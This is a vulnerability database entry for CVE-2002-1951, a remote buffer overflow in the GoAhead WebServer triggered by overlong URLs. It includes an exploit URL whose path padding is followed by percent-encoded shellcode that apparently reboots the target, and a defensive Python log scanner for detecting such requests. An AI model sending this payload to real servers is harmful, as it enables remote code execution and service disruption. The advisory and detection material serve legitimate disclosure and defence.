GoAhead WebServer Remote Buffer Overflow Vulnerability


Vulnerability ID: 1106916 Vulnerability type: Boundary condition error
Published: 2002-08-14 Updated: 2005-10-20
CVE ID: CVE-2002-1951
CNNVD-ID: CNNVD-200212-411
Affected platform: Windows CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/21707
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-411
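|Vulnerability details
GoAhead WebServer is a small embedded web server from the US company Embedthis that can be embedded in a wide range of devices and applications. GoAhead WebServer contains a buffer overflow vulnerability that a remote attacker can exploit to execute code on the system with the privileges of the web process. GoAhead WebServer does not correctly handle user-submitted URL requests: a remote attacker can submit a specially crafted malicious URL that causes a buffer overflow while GoAhead WebServer processes it, and by overwriting the return address in memory can execute arbitrary instructions with the privileges of the web process.
|Exploit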
source: http://www.securityfocus.com/bid/5464/info

GoAhead WebServer is an Open Source embedded web server which supports Active Server Pages, embedded javascript, and SSL authentication and encryption. It is available for a variety of platforms including Microsoft Windows and Linux variant operating systems.

It has been discovered that a buffer overflow exists in GoAhead WebServer. This vulnerability could make it possible for a remote user to execute arbitrary code with the privileges of the web server process. This could lead to an attacker gaining remote access to a vulnerable host.

http://www.example.com/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/x/%eb%1f%5e%89%76%08%31%c0%88%46%07%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%db%89%d8%40%cd%80%e8%dc%ff%ff%ffreboot
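For defenders, the request shape described above (a very deep path ending in percent-encoded binary bytes) can be hunted for in web access logs. The following is an added example, not part of the original advisory or of GoAhead; the thresholds, the Common Log Format input and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumed thresholds (not from the advisory); tune against baseline traffic.
MAX_URI_LEN = 256       # total request-target length
MAX_DEPTH = 32          # number of non-empty path segments
MAX_BINARY_BYTES = 8    # decoded bytes outside printable ASCII

# Request line as it appears in Common Log Format (assumed log format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')

def score_uri(uri):
    """Return the indicators a request-target shows for a long-URL overflow attempt."""
    path = uri.split("?", 1)[0]
    decoded = unquote_to_bytes(path)   # decode %xx so raw bytes can be inspected
    reasons = []
    if len(uri) > MAX_URI_LEN:
        reasons.append("length")
    if len([seg for seg in path.split("/") if seg]) > MAX_DEPTH:
        reasons.append("depth")
    if sum(1 for b in decoded if b < 0x20 or b > 0x7E) > MAX_BINARY_BYTES:
        reasons.append("binary")
    return reasons

def scan(lines):
    """Yield (line_number, reasons) for log lines showing at least two indicators."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = score_uri(match.group("uri"))
        if len(reasons) >= 2:          # one indicator alone is too noisy to alert on
            yield number, reasons

# Constructed sample data: neutral filler bytes 0x80-0x9f, not a real payload.
_deep = "/" + "x/" * 67
_filler = "".join("%%%02x" % b for b in range(0x80, 0xA0))
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Aug/2002:10:00:00 +0000] "GET /index.asp HTTP/1.0" 200 512',
    '192.0.2.11 - - [14/Aug/2002:10:00:05 +0000] "GET /docs/' + "a" * 300 + '.html HTTP/1.0" 404 0',
    '192.0.2.12 - - [14/Aug/2002:10:00:09 +0000] "GET ' + _deep + _filler + ' HTTP/1.0" 500 0',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious request ({', '.join(reasons)})")
```

Requiring two indicators keeps a merely long but legitimate URL (the second sample line) from raising an alert.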
|References

Source: BID
Name: 5464
Link: http://www.securityfocus.com/bid/5464
Source: www.securiteam.com
Link: http://www.securiteam.com/securitynews/5MP0C1580W.html
Source: XF
Name: goahead-long-url-bo(9884)
Link: http://www.iss.net/security_center/static/9884.php
Source: NSFOCUS
Name: 3325
Link: http://www.nsfocus.net/vulndb/3325
